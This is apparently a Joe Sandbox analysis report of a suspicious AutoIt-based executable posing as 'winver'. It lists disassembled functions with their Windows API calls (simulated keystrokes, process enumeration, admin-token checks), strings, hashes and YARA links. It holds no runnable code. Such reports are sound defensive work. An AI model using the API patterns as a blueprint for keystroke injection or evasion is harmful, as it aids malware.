String ID: %d/%02d/%02d
API String ID: 1218376639-328681919
Opcode ID: c0aac81335bd09919ec2ed9a3c5bde01e467c772bc1c1a2d8b93732fd0011cb3
Instruction ID: d80e5d988ebd09a8a8013f5c2d0d3a8a50f4866b4228c99bb80a55abd77c22d9
Opcode Fuzzy Hash: c0aac81335bd09919ec2ed9a3c5bde01e467c772bc1c1a2d8b93732fd0011cb3
Instruction Fuzzy Hash: CC12F376B0964A86FB548FA5D8506BE33A0EB84B98F144135DE5E87BD4EF3CF406A700

Function 00007FF63D7B4BB4 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF63D7B4BCF
FindWindowW.USER32 ref: 00007FF63D7FB6DC
IsIconic.USER32 ref: 00007FF63D7FB6E8
ShowWindow.USER32 ref: 00007FF63D7FB6FA
SetForegroundWindow.USER32 ref: 00007FF63D7FB703
GetWindowThreadProcessId.USER32 ref: 00007FF63D7FB716
GetCurrentThreadId.KERNEL32 ref: 00007FF63D7FB71E
GetWindowThreadProcessId.USER32 ref: 00007FF63D7FB72C
AttachThreadInput.USER32 ref: 00007FF63D7FB742
AttachThreadInput.USER32 ref: 00007FF63D7FB750
AttachThreadInput.USER32 ref: 00007FF63D7FB75E
SetForegroundWindow.USER32 ref: 00007FF63D7FB767
MapVirtualKeyW.USER32 ref: 00007FF63D7FB77C
keybd_event.USER32 ref: 00007FF63D7FB78D
MapVirtualKeyW.USER32 ref: 00007FF63D7FB797
keybd_event.USER32 ref: 00007FF63D7FB7A9
MapVirtualKeyW.USER32 ref: 00007FF63D7FB7B3
keybd_event.USER32 ref: 00007FF63D7FB7C4
MapVirtualKeyW.USER32 ref: 00007FF63D7FB7CE
keybd_event.USER32 ref: 00007FF63D7FB7E0
SetForegroundWindow.USER32 ref: 00007FF63D7FB7E9
AttachThreadInput.USER32 ref: 00007FF63D7FB806
AttachThreadInput.USER32 ref: 00007FF63D7FB814
AttachThreadInput.USER32 ref: 00007FF63D7FB822

Strings

Shell_TrayWnd, xrefs: 00007FF63D7FB6D5

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 3778422247-2988720461
Opcode ID: bed9c5047cf94cd96735df2ef54c67afd57ad6aed6a5163a256d19e77974575d
Instruction ID: 1ff943d5058590eff23ebfe5b0e2634930542b0324be76c2f3db089abdf5d3f4
Opcode Fuzzy Hash: bed9c5047cf94cd96735df2ef54c67afd57ad6aed6a5163a256d19e77974575d
Instruction Fuzzy Hash: 96419625F0891683F7149FA6A91977A22F6BF88F84F504035C90AC7B54FE3EF80A9340

Function 00007FF63D792780 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00007FF63D792888
GetSystemMetrics.USER32 ref: 00007FF63D792893
SystemParametersInfoW.USER32 ref: 00007FF63D7928C5
GetSystemMetrics.USER32 ref: 00007FF63D7928CF
GetSystemMetrics.USER32 ref: 00007FF63D7928FA
SetRect.USER32 ref: 00007FF63D79291D
AdjustWindowRectEx.USER32 ref: 00007FF63D792930
CreateWindowExW.USER32 ref: 00007FF63D79298F
SetWindowLongPtrW.USER32 ref: 00007FF63D7929AE
GetClientRect.USER32 ref: 00007FF63D7929D0
GetStockObject.GDI32 ref: 00007FF63D7929EC
SendMessageW.USER32 ref: 00007FF63D7929FF

Part of subcall function 00007FF63D791990: GetCursorPos.USER32 ref: 00007FF63D7919BF
Part of subcall function 00007FF63D791990: ScreenToClient.USER32 ref: 00007FF63D7919DE
Part of subcall function 00007FF63D791990: GetAsyncKeyState.USER32 ref: 00007FF63D791A06
Part of subcall function 00007FF63D791990: GetAsyncKeyState.USER32 ref: 00007FF63D791A26

SetTimer.USER32 ref: 00007FF63D792A30

Strings

AutoIt v3 GUI, xrefs: 00007FF63D79297F

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 8d64c2578e8db04a10b0d9c51196468e8b2577cb64cadfa83c34c5e4ab401ee7
Instruction ID: 6bc4d69fac4b679b5aeff82fb714b36a692daab9b7011bddfbeddae844995484
Opcode Fuzzy Hash: 8d64c2578e8db04a10b0d9c51196468e8b2577cb64cadfa83c34c5e4ab401ee7
Instruction Fuzzy Hash: 60D14A32A04A4A8AEB54DFA9D8547AD37B5FB44758F104135DA0E83BA8EF38F548D700

Function 00007FF63D7D589C Relevance: 25.8, APIs: 9, Strings: 5, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF63D7D58E5
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D5F5E
memcpy_s.LIBCMT ref: 00007FF63D7D690B
memcpy_s.LIBCMT ref: 00007FF63D7D69B2

Part of subcall function 00007FF63D7C2228: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C225A

memcpy_s.LIBCMT ref: 00007FF63D7D6A7B

Part of subcall function 00007FF63D7CB8C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CB8E9

Strings

1#INF, xrefs: 00007FF63D7D6B53
1#IND, xrefs: 00007FF63D7D6AF6
1#SNAN, xrefs: 00007FF63D7D6B15
1#QNAN, xrefs: 00007FF63D7D6B34
(_3, xrefs: 00007FF63D7D5A74, 00007FF63D7D5D29

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
String ID: (_3$1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 281475176-3053093932
Opcode ID: 6da259f4ced7acd15935ef6cb435976f6f6c5e84ac198f2fde42526d99d44ca5
Instruction ID: c7e2c8bc7054a74cef85c480e1c6e16b5fb786912c07b25761b43da7bb76043d
Opcode Fuzzy Hash: 6da259f4ced7acd15935ef6cb435976f6f6c5e84ac198f2fde42526d99d44ca5
Instruction Fuzzy Hash: 4AB2D472E0829A8BE7359EA9D5406FD37B1FF84788F505135DA0A97B88EF39F5049B00

Function 00007FF63D794358 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

P, xrefs: 00007FF63D794381

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: cfb32dd4f35dc06a3676fa8b9f47a5bacf8e937a39ea4f96be451f3cdb110e08
Instruction ID: 87ecdb5b041ef564f3ac458e7aa6f28aa0f2572b743f2655cf97daf9937c32ea
Opcode Fuzzy Hash: cfb32dd4f35dc06a3676fa8b9f47a5bacf8e937a39ea4f96be451f3cdb110e08
Instruction Fuzzy Hash: 41A19B32A08A4A86E724CFA5E4192ADB770FF84788F508136DA5E93B94EF7CF545D700

Function 00007FF63D829658 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00007FF63D829B29
Not an Object type, xrefs: 00007FF63D8296E2

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 15d875ca7b774dbd339fb7bc651317ca2d90a9cf2b17b8eb0f97601004689752
Instruction ID: 50162100f2f5ba2614c104f85185eba0b82bf51dfe0b9167c1db5ebd69b872bc
Opcode Fuzzy Hash: 15d875ca7b774dbd339fb7bc651317ca2d90a9cf2b17b8eb0f97601004689752
Instruction Fuzzy Hash: A9E1C3B6A08B8696EB10DFA5D4402AD77B4FB84B98F404136DE4D87B94EF3CE546D700

Function 00007FF63D813EA8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(?,?,?,00007FF63D7F2536), ref: 00007FF63D813ECE
FindResourceExW.KERNEL32(?,?,?,00007FF63D7F2536), ref: 00007FF63D813EEE
LoadResource.KERNEL32(?,?,?,00007FF63D7F2536), ref: 00007FF63D813F03
SizeofResource.KERNEL32(?,?,?,00007FF63D7F2536), ref: 00007FF63D813F18
LockResource.KERNEL32(?,?,?,00007FF63D7F2536), ref: 00007FF63D813F27

Strings

SCRIPT, xrefs: 00007FF63D813EE0

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f431b102791749b5aa2fb2ea2772ea25c0aaa5de41efcce0d91aadf49acfda44
Instruction ID: 30160690c7d620d469d6b40cf40b481ea036eac9bd337466667f3b66a63d1908
Opcode Fuzzy Hash: f431b102791749b5aa2fb2ea2772ea25c0aaa5de41efcce0d91aadf49acfda44
Instruction Fuzzy Hash: 13216A72A08B8582EB108B66E448B6A63B0FB88F98F045435DE4D83B54EF3CE449D700

Function 00007FF63D7CB558 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF63D7CB5D1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF63D7CB5E9
RtlVirtualUnwind.KERNEL32 ref: 00007FF63D7CB624
IsDebuggerPresent.KERNEL32 ref: 00007FF63D7CB65D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF63D7CB667
UnhandledExceptionFilter.KERNEL32 ref: 00007FF63D7CB672

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: bdf7eb782d7ecb6d3ae8c496278f5f49774733f6c5dcbdbf71d3542ebf4b43eb
Instruction ID: c6d72315e511deca195e2857f1b8579e04557312a7b90c391c021cd0871d5ef1
Opcode Fuzzy Hash: bdf7eb782d7ecb6d3ae8c496278f5f49774733f6c5dcbdbf71d3542ebf4b43eb
Instruction Fuzzy Hash: A6316232A08B8586DB60CF65E8442EE73B4FB88754F500136EA8D87B95EF3CE545CB00

Function 00007FF63D791990 Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF63D7919BF
ScreenToClient.USER32 ref: 00007FF63D7919DE
GetAsyncKeyState.USER32 ref: 00007FF63D791A06
GetAsyncKeyState.USER32 ref: 00007FF63D791A26

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 91ffd5c3290301ad4bd7ce282157c7ed3f22b30f968482b47c3f8ef98c7d536a
Instruction ID: 987b29bc46d5c0d63c7a4adb3ae840495af60ba07868884fc98e16387629cfd8
Opcode Fuzzy Hash: 91ffd5c3290301ad4bd7ce282157c7ed3f22b30f968482b47c3f8ef98c7d536a
Instruction Fuzzy Hash: C751AE36B096869BE358CFB589405A977B4FB45794F100231EE6E83BD5EF38F8619700

Function 00007FF63D7B61C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF63D7B6221
IsDebuggerPresent.KERNEL32 ref: 00007FF63D7B6239
OutputDebugStringW.KERNEL32 ref: 00007FF63D7B624A

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF63D7B6243

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: eca31fbc4a029550a0172660d91826e41276ee25e63d7c8576dfba6f553f0a46
Instruction ID: e531de6e62aa6a188b4002da164225629a568c0982300928fd85fa2b6fb68eac
Opcode Fuzzy Hash: eca31fbc4a029550a0172660d91826e41276ee25e63d7c8576dfba6f553f0a46
Instruction Fuzzy Hash: 25113632A14B4A96FB149BA2EA553B933B8FB44749F404139C64D86B90EF3CF4B8D710

Function 00007FF63D8040CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF63D8040E3
GetProcAddress.KERNEL32 ref: 00007FF63D8040FB

Strings

GetNativeSystemInfo, xrefs: 00007FF63D8040F1
kernel32.dll, xrefs: 00007FF63D8040DC

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 4503eeb598199e6e24f077083f4d6144bcd7698144270c41c6cc0562ee8f2022
Instruction ID: ecf4dd514533d0205119dab7f12a5ca8ac6d1cae594f2c941b21c75ec86fb924
Opcode Fuzzy Hash: 4503eeb598199e6e24f077083f4d6144bcd7698144270c41c6cc0562ee8f2022
Instruction Fuzzy Hash: D5E0E521906B0A92EF14CFA4E4153A823A5FB18B54F440435C91D86354FFBCE6A9D740

Function 00007FF63D80CC88 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF63D80CCC3
Process32FirstW.KERNEL32 ref: 00007FF63D80CCD3
CloseHandle.KERNEL32 ref: 00007FF63D80CDDD

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 9c05c6e23f593b1f5166e0900c8fd34058a772bd9a075b837ed1f308884434ea
Instruction ID: 49d60d126876781d49f093318ed66a39fcc4f8cf8819422f2b52f8cba07bdbf9
Opcode Fuzzy Hash: 9c05c6e23f593b1f5166e0900c8fd34058a772bd9a075b837ed1f308884434ea
Instruction Fuzzy Hash: 0A417E32A19A8A92E710EFA2E4511EE6774FB84BC4F944032EE4E83795EF7CE505D700

Function 00007FF63D80D658 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00007FF63D80D664
GetFileAttributesW.KERNEL32 ref: 00007FF63D80D678
FindFirstFileW.KERNEL32 ref: 00007FF63D80D68B
FindClose.KERNEL32 ref: 00007FF63D80D69A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: bfe3f501b1ed66ed079b6358db1e27205250acab507486bf91ee227c67969a0b
Instruction ID: 7dc428b118653dd71dc07fd4694ee8f3fe6115970d4159b88da4b1332af08ab1
Opcode Fuzzy Hash: bfe3f501b1ed66ed079b6358db1e27205250acab507486bf91ee227c67969a0b
Instruction Fuzzy Hash: ACF08920E0964AC2EA245FA8B8193751370AF41FB9F540330D57E867E0FF3CB4495940

Function 00007FF63D7C1D50 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF63D7C1DDB

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
Instruction ID: 9991836e6906033c80e4b9fc1dad89c4e5b8d43c26844c1024c3d06f795992fe
Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
Instruction Fuzzy Hash: 19D1C032B1828A8BDB24CF55A58466AB6A1FB88784F548134DF4E93B54EF3CF945DB00

Function 00007FF63D7FE318 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF63D7FE364
CheckTokenMembership.ADVAPI32 ref: 00007FF63D7FE37B
FreeSid.ADVAPI32 ref: 00007FF63D7FE38C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 0f69606c6bd559e68565b1da53650df1c965ab4f676427446a091ff3eb7c5da7
Instruction ID: d765d84252089058fdf8bb4cbac5665fed395da43d7c46c9a061d6dcf32f0585
Opcode Fuzzy Hash: 0f69606c6bd559e68565b1da53650df1c965ab4f676427446a091ff3eb7c5da7
Instruction Fuzzy Hash: 810140736247858FE7208F60D4553AD37B4F76476EF000929E64986A98DF7DD158CF40

Function 00007FF63D7CC4F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF63D7C4D5C,?,?,00000000,00007FF63D7C4DD9,?,?,?,?,?,00007FF63D8132B8), ref: 00007FF63D7CC53F

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00007FF63D7CC518

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 716f823dd8d451cff7a4c4c59448400181c424d42b7160b87d54046d477d74d4
Instruction ID: fcb15201f49391fcb62513612da718060f0b15019588926271b4e054014278c4
Opcode Fuzzy Hash: 716f823dd8d451cff7a4c4c59448400181c424d42b7160b87d54046d477d74d4
Instruction Fuzzy Hash: 94F03920E09A4B81FE149BA1B8011B423B4AF88BC0F985036E90E87355FE3CF488E300

Function 00007FF63D814940 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF63D828DCA), ref: 00007FF63D814962
FormatMessageW.KERNEL32 ref: 00007FF63D814991

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
